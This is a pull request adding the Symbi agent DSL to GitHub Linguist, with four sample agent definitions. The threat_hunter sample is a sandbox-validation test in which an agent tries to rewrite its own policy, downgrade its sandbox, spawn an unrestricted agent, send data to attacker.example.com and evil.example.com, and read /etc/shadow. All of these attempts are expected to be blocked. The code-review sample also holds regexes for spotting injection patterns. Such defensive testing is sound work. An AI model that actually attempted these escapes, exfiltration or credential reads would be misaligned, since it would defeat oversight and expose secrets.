### PR TITLE
Add Symbi agent DSL (.symbi)

### DIFF
--- a/lib/linguist/languages.yml
+++ b/lib/linguist/languages.yml
@@ -7639,6 +7639,13 @@ Swift:
   codemirror_mode: swift
   codemirror_mime_type: text/x-swift
   language_id: 362
+Symbi:
+  type: programming
+  color: "#5b6cff"
+  extensions:
+  - ".symbi"
+  tm_scope: source.symbi
+  ace_mode: text
 SystemVerilog:
   type: programming
   color: "#DAE1C2"

--- a/samples/Symbi/api_aggregator.symbi
+++ b/samples/Symbi/api_aggregator.symbi
@@ -1,0 +1,83 @@
+metadata {
+    version = "1.0.0"
+    author = "Symbiont Community"
+    description = "Multi-source API aggregator with parallel fetching and normalization"
+    tags = ["api", "aggregation", "data-integration", "http"]
+}
+
+agent api_aggregator(sources: Array<APISource>, query: String) -> AggregatedData {
+    capabilities = ["api_access", "data_aggregation", "response_merging"]
+
+    policy api_access {
+        allow: ["https_request"] if request.url in sources.map(s => s.endpoint)
+        deny: ["http_request", "execute_code", "file_access"]
+
+        require: {
+            tls_verification: true,
+            api_key_rotation: "30_days",
+            rate_limiting: "1000/hour",
+            timeout_per_request: "3000ms"
+        }
+
+        audit: {
+            log_level: "info",
+            include_request_headers: false,  // May contain API keys
+            include_response_status: true,
+            include_latency: true,
+            alert_on_errors: true
+        }
+    }
+
+    with
+        memory = "ephemeral",
+        security = "high",
+        sandbox = "Tier1",
+        timeout = 30000,
+        max_memory_mb = 512,
+        max_cpu_cores = 1.0
+    {
+        try {
+            results = [];
+
+            for source in sources {
+                try {
+                    response = http.get(source.endpoint, {
+                        query: query,
+                        headers: {
+                            "Authorization": "Bearer " + vault://api/keys[source.auth_key],
+                            "Content-Type": "application/json"
+                        },
+                        timeout: 3000,
+                        verify_tls: true
+                    });
+
+                    standardized_data = normalize_response(response.body, source.schema);
+                    results.append({
+                        "source": source.name,
+                        "data": standardized_data,
+                        "timestamp": now()
+                    });
+
+                } catch (APIError e) {
+                    log("WARNING", "API call failed for source: " + source.name);
+                    results.append({
+                        "source": source.name,
+                        "error": e.message,
+                        "timestamp": now()
+                    });
+                }
+            }
+
+            return AggregatedData {
+                query: query,
+                sources_queried: sources.length,
+                successful_responses: results.filter(r => r.data != null).length,
+                aggregated_results: merge_results(results)
+            };
+
+        } catch (error) {
+            log("ERROR", "API aggregation failed: " + error.message);
+            return error("Aggregation failed: " + error.message);
+        }
+    }
+}

--- a/samples/Symbi/code_review_pipeline.symbi
+++ b/samples/Symbi/code_review_pipeline.symbi
@@ -1,0 +1,218 @@
+metadata {
+    version = "1.0.0"
+    author = "Symbiont Community"
+    description = "Multi-agent code review pipeline: untrusted developer in strict sandbox passes code to AgentPin-authenticated reviewer"
+    tags = ["multi-agent", "code-review", "agentpin", "sandbox", "trust-boundary"]
+}
+
+# Two-agent pipeline demonstrating trust boundaries:
+#
+# 1. untrusted_developer — confined to Tier2 (gVisor), can only read
+#    and analyze code. Cannot execute, deploy, or access network.
+#
+# 2. trusted_reviewer — authenticated via AgentPin ES256 credentials.
+#    Can sign approved code and authorize execution. Only accepts
+#    input from verified agents.
+#
+# The CommunicationPolicyGate enforces that the untrusted developer
+# can only send to the reviewer, never bypass it.
+
+agent untrusted_developer(code: String, language: String) -> ReviewRequest {
+    capabilities = ["read", "analyze", "lint", "format"]
+
+    policy strict_sandbox {
+        // Read and analyze only
+        allow: read(file) if file.in_project == true
+        allow: analyze(code) if true
+        allow: lint(code) if true
+        allow: format(code) if true
+
+        // Cannot execute any code
+        deny: execute(any)
+        deny: invoke_tool(tool) if tool.name == "Bash"
+        deny: invoke_tool(tool) if tool.name == "Write"
+
+        // Cannot access network
+        deny: network_access(any)
+        deny: web_request(any)
+
+        // Can only communicate with trusted_reviewer
+        allow: delegate(agent) if agent.name == "trusted_reviewer"
+        deny: delegate(agent) if agent.name != "trusted_reviewer"
+        deny: send_to(agent) if agent.name != "trusted_reviewer"
+
+        audit: {
+            log_level: "info",
+            include_all_tool_calls: true,
+            include_code_diffs: false,    // don't log full code in audit
+            include_policy_decisions: true
+        }
+    }
+
+    with
+        sandbox = "Tier2",          // gVisor — untrusted code isolation
+        memory = "ephemeral",       // no state persistence
+        timeout = 120000,           // 2 minutes
+        max_memory_mb = 512,
+        max_cpu_cores = 1.0,
+        network_policy = "deny_all"
+    {
+        // Step 1: Static analysis (no execution)
+        let analysis = analyze(code, language);
+
+        // Step 2: Lint for common issues
+        let lint_results = lint(code, {
+            language: language,
+            rules: ["security", "best-practices", "complexity"]
+        });
+
+        // Step 3: Check for dangerous patterns
+        let security_findings = [];
+        let patterns = [
+            { name: "shell_injection", regex: "exec\\(|system\\(|popen\\(" },
+            { name: "sql_injection", regex: "format!.*SELECT|query.*\\+" },
+            { name: "path_traversal", regex: "\\.\\./|\\.\\.\\\\"},
+            { name: "hardcoded_secrets", regex: "password\\s*=|api_key\\s*=|secret\\s*=" }
+        ];
+
+        for pattern in patterns {
+            if code.contains_pattern(pattern.regex) {
+                security_findings.push({
+                    type: pattern.name,
+                    severity: "high",
+                    recommendation: "Review and remediate before approval"
+                });
+            }
+        }
+
+        // Step 4: Build review request for trusted reviewer
+        let review_request = ReviewRequest {
+            code: code,
+            language: language,
+            complexity_score: analysis.complexity,
+            lint_issues: lint_results.issues,
+            security_findings: security_findings,
+            recommendation: if security_findings.len() == 0 {
+                "APPROVE"
+            } else {
+                "REVIEW_REQUIRED"
+            },
+            developer_agent: "untrusted_developer",
+            timestamp: now()
+        };
+
+        // Step 5: Send to trusted reviewer via CommunicationBus
+        let reviewer_response = delegate("trusted_reviewer", {
+            action: "review",
+            request: review_request
+        });
+
+        return reviewer_response;
+    }
+}
+
+agent trusted_reviewer(request: ReviewRequest) -> ReviewDecision {
+    capabilities = ["read", "analyze", "sign", "approve", "execute_tests"]
+
+    policy authenticated_reviewer {
+        // Require AgentPin authentication
+        require: {
+            agentpin_verified: true,
+            agentpin_algorithm: "ES256",
+            identity_domain: "thirdkey.ai"
+        }
+
+        // Only accept input from known agents
+        allow: receive(message) if message.sender.agentpin_verified == true
+        deny: receive(message) if message.sender.agentpin_verified == false
+
+        // Can run tests in isolated environment
+        allow: execute_tests(code) if code.reviewed == true
+        deny: execute(code) if code.reviewed == false
+
+        // Can sign approved code
+        allow: sign(artifact) if artifact.review_status == "approved"
+
+        // Cannot modify source directly
+        deny: write(file) if file.is_source_code == true
+
+        audit: {
+            log_level: "info",
+            include_review_decisions: true,
+            include_approval_chain: true,
+            include_signatures: true
+        }
+    }
+
+    with
+        sandbox = "Tier1",          // Docker — trusted but isolated
+        memory = "persistent",      // remember review history
+        timeout = 60000,
+        max_memory_mb = 1024
+    {
+        // Step 1: Verify the request came from an authenticated agent
+        if !request.developer_agent.agentpin_verified {
+            return ReviewDecision {
+                status: "REJECTED",
+                reason: "Request from unverified agent",
+                signed: false
+            };
+        }
+
+        // Step 2: Review security findings
+        if request.security_findings.len() > 0 {
+            let critical = request.security_findings.filter(f => f.severity == "critical");
+            if critical.len() > 0 {
+                return ReviewDecision {
+                    status: "REJECTED",
+                    reason: "Critical security findings: " + critical.map(f => f.type).join(", "),
+                    findings: request.security_findings,
+                    signed: false
+                };
+            }
+        }
+
+        // Step 3: Run tests if analysis looks clean
+        let test_results = {};
+        if request.recommendation == "APPROVE" {
+            try {
+                test_results = execute_tests(request.code, {
+                    language: request.language,
+                    timeout: 30000,
+                    sandbox: "Tier2"  // tests run in stricter sandbox
+                });
+            } catch (test_error) {
+                return ReviewDecision {
+                    status: "REJECTED",
+                    reason: "Tests failed: " + test_error.message,
+                    signed: false
+                };
+            }
+        }
+
+        // Step 4: Approve and sign
+        let decision = ReviewDecision {
+            status: "APPROVED",
+            reviewer: "trusted_reviewer",
+            code_hash: hash_sha256(request.code),
+            lint_issues: request.lint_issues.len(),
+            security_findings: request.security_findings.len(),
+            test_results: test_results,
+            timestamp: now()
+        };
+
+        // Sign the approval with AgentPin credentials
+        decision.signature = sign_with_agentpin(decision);
+        decision.signed = true;
+
+        log("INFO", format(
+            "Code review APPROVED: {} ({} lint issues, {} security findings, hash: {})",
+            request.language,
+            decision.lint_issues,
+            decision.security_findings,
+            decision.code_hash
+        ));
+
+        return decision;
+    }
+}

--- a/samples/Symbi/data_validator.symbi
+++ b/samples/Symbi/data_validator.symbi
@@ -1,0 +1,91 @@
+metadata {
+    version = "1.0.0"
+    author = "Symbiont Community"
+    description = "Schema validation and data quality assessment engine"
+    tags = ["validation", "quality", "schema", "compliance"]
+}
+
+agent data_validator(data: DataSet, schema: ValidationSchema) -> ValidationReport {
+    capabilities = ["data_validation", "schema_checking", "quality_assessment"]
+
+    policy data_quality {
+        allow: ["read_data", "validate_schema", "quality_check"]
+            if data.source.trusted == true && data.records.length <= 100000
+        deny: ["write_data", "execute_code", "network_access"]
+
+        require: {
+            schema_validation: true,
+            input_sanitization: true,
+            max_data_size: "100MB"
+        }
+
+        audit: {
+            log_level: "info",
+            include_input: false,  // Protect PII in data
+            include_statistics: true,
+            include_validation_errors: true,
+            compliance_tags: ["data-quality", "GDPR"]
+        }
+    }
+
+    with
+        memory = "ephemeral",
+        privacy = "high",
+        security = "high",
+        sandbox = "Tier1",
+        timeout = 30000,
+        max_memory_mb = 1024,
+        max_cpu_cores = 1.0
+    {
+        try {
+            // Validate inputs
+            if data.records.length == 0 {
+                return ValidationReport {
+                    valid_records: 0,
+                    invalid_records: 0,
+                    errors: [],
+                    warnings: ["No records to validate"],
+                    quality_score: 0.0
+                };
+            }
+
+            report = ValidationReport {
+                valid_records: 0,
+                invalid_records: 0,
+                errors: [],
+                warnings: [],
+                quality_score: 0.0
+            };
+
+            for record in data.records {
+                validation_result = validate_against_schema(record, schema);
+
+                if validation_result.valid {
+                    report.valid_records += 1;
+                } else {
+                    report.invalid_records += 1;
+                    report.errors.append(validation_result.errors);
+                }
+            }
+
+            let total = report.valid_records + report.invalid_records;
+            report.quality_score = if total > 0 {
+                report.valid_records / total
+            } else {
+                0.0
+            };
+
+            return report;
+
+        } catch (error) {
+            log("ERROR", "Validation failed: " + error.message);
+            return ValidationReport {
+                valid_records: 0,
+                invalid_records: 0,
+                errors: [error.message],
+                warnings: [],
+                quality_score: 0.0
+            };
+        }
+    }
+}

--- a/samples/Symbi/threat_hunter.symbi
+++ b/samples/Symbi/threat_hunter.symbi
@@ -1,0 +1,136 @@
+metadata {
+    version = "1.0.0"
+    author = "Symbiont Community"
+    description = "Threat-hunting agent that simulates attack patterns to validate runtime sandboxing and Cedar policy enforcement"
+    tags = ["security", "threat-hunting", "red-team", "sandbox-validation", "cedar"]
+}
+
+# This agent intentionally attempts unauthorized actions to prove the
+# runtime blocks them. Run it to validate your Cedar policies and
+# sandbox configuration are working correctly.
+
+agent threat_hunter(scenario: String) -> ThreatReport {
+    capabilities = ["read", "analyze", "network_scan"]
+
+    policy threat_containment {
+        // Allow reading public data and analyzing patterns
+        allow: read(resource) if resource.classification != "secret"
+        allow: analyze(data) if true
+
+        // Block all write operations — threat hunter is read-only
+        deny: write(any)
+        deny: execute(cmd) if true
+        deny: network_access(target) if target.internal == true
+
+        // Block exfiltration patterns (VectorSmuggle simulation)
+        deny: export(data) if data.size > 1024
+        deny: send(message) if message.destination.external == true
+
+        // Block privilege escalation (AgentNull simulation)
+        deny: invoke_tool(tool) if tool.requires_elevated == true
+        deny: modify_policy(any)
+
+        audit: {
+            log_level: "warning",
+            include_blocked_actions: true,
+            include_policy_decisions: true,
+            alert_on_denied: true
+        }
+    }
+
+    with
+        sandbox = "Tier2",          // gVisor — maximum isolation
+        memory = "ephemeral",       // no persistence between runs
+        timeout = 60000,            // 1 minute max
+        max_memory_mb = 256,        // tight resource limits
+        max_cpu_cores = 0.5,
+        network_policy = "deny_all" // no network by default
+    {
+        report = ThreatReport {
+            scenario: scenario,
+            tests_run: [],
+            blocks_verified: [],
+            policy_gaps: []
+        };
+
+        match scenario {
+            "agentnull_bypass" => {
+                // Attempt 1: Try to modify own policy (should be blocked)
+                try {
+                    modify_policy("threat_containment", { allow: execute(any) });
+                    report.policy_gaps.push("CRITICAL: policy self-modification was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("Policy self-modification blocked");
+                }
+
+                // Attempt 2: Try to escalate to Tier0 sandbox (should be blocked)
+                try {
+                    set_sandbox("Tier0");
+                    report.policy_gaps.push("CRITICAL: sandbox downgrade was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("Sandbox downgrade blocked");
+                }
+
+                // Attempt 3: Try to spawn an unrestricted child agent
+                try {
+                    spawn_agent("unrestricted", { capabilities: ["all"], sandbox: "Tier0" });
+                    report.policy_gaps.push("CRITICAL: unrestricted agent spawn was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("Unrestricted agent spawn blocked");
+                }
+            },
+
+            "vectorsmuggle_exfil" => {
+                // Attempt 1: Exfiltrate via oversized payload
+                try {
+                    let payload = generate_test_data(megabytes = 10);
+                    export(payload, destination = "https://attacker.example.com");
+                    report.policy_gaps.push("CRITICAL: large data export was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("Large data export blocked");
+                }
+
+                // Attempt 2: Exfiltrate via DNS tunneling simulation
+                try {
+                    network_access({ target: "evil.example.com", protocol: "dns" });
+                    report.policy_gaps.push("CRITICAL: DNS exfiltration was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("DNS exfiltration blocked");
+                }
+
+                // Attempt 3: Embed data in tool output metadata
+                try {
+                    let secret_data = read("/etc/shadow");
+                    report.policy_gaps.push("CRITICAL: sensitive file read was allowed");
+                } catch (denied) {
+                    report.blocks_verified.push("Sensitive file access blocked");
+                }
+            },
+
+            "full_assessment" => {
+                // Run all scenarios
+                report.tests_run = ["agentnull_bypass", "vectorsmuggle_exfil"];
+                // ... combines both test suites
+            },
+
+            _ => {
+                return error("Unknown scenario: " + scenario + ". Use: agentnull_bypass, vectorsmuggle_exfil, full_assessment");
+            }
+        }
+
+        report.summary = format(
+            "{} tests run, {} blocks verified, {} gaps found",
+            report.tests_run.len(),
+            report.blocks_verified.len(),
+            report.policy_gaps.len()
+        );
+
+        if report.policy_gaps.len() > 0 {
+            log("CRITICAL", "Policy gaps detected: " + report.policy_gaps.join(", "));
+        } else {
+            log("INFO", "All threat scenarios successfully contained");
+        }
+
+        return report;
+    }
+}


### PR DESCRIPTION
## Summary

Adds the Symbi agent DSL (`.symbi`) used by the open-source [Symbiont][symbiont] runtime — a Rust-native runtime for executing AI agents under explicit policy, identity, and audit controls.

A typical `.symbi` file declares an agent with metadata, capabilities, policies, and a typed function body that the runtime executes under sandbox / policy / audit constraints.

## Ecosystem

- **Tree-sitter grammar:** https://github.com/ThirdKeyAI/tree-sitter-symbiont — published to [npm](https://www.npmjs.com/package/tree-sitter-symbiont) and [crates.io](https://crates.io/crates/tree-sitter-symbiont)
- **VS Code extension:** https://github.com/ThirdKeyAI/vscode-symbiont — TextMate grammar (scope: `source.symbi`)
- **Docs:** https://docs.symbiont.dev/dsl-guide
- **Runtime (v1.13.0):** https://github.com/ThirdKeyAI/Symbiont

## Files

- `lib/linguist/languages.yml` — new `Symbi` entry under `programming`, color `#5b6cff`, extension `.symbi`, `tm_scope: source.symbi`
- `samples/Symbi/` — four representative samples taken from the Symbiont repo's [`agents/`](https://github.com/ThirdKeyAI/Symbiont/tree/main/agents) directory:
  - `api_aggregator.symbi` — multi-source API aggregator
  - `data_validator.symbi` — schema validation
  - `code_review_pipeline.symbi` — multi-agent pipeline demonstrating trust boundaries and AgentPin authentication
  - `threat_hunter.symbi` — security simulation that validates runtime sandboxing

All samples are real-world code from the Symbiont repository, licensed under Apache-2.0.

## Notes

- `language_id` is intentionally omitted per the "Adding a language" instructions in CONTRIBUTING.md (step 1: "Omit the language_id field for now"). I was unable to run `script/update-ids` locally due to a Gemfile / rake build issue on my system; please re-run it in CI / on the merge or assign a canonical ID.
- In-the-wild usage: the canonical `.symbi` extension was introduced in Symbiont [v1.12.0 (2026-04-29)](https://github.com/ThirdKeyAI/Symbiont/releases/tag/v1.12.0); prior to that the same DSL used the `.dsl` extension. `.dsl` is intentionally _not_ included here because it is too generic — only `.symbi` should be associated with the Symbi entry.
- Sample files use no "Hello World" content; each is a representative agent definition exercising the language's distinctive constructs (capabilities, policies, with-blocks, ToolClad named arguments, vault URLs, type literals, lambdas, statements).

[symbiont]: https://github.com/ThirdKeyAI/Symbiont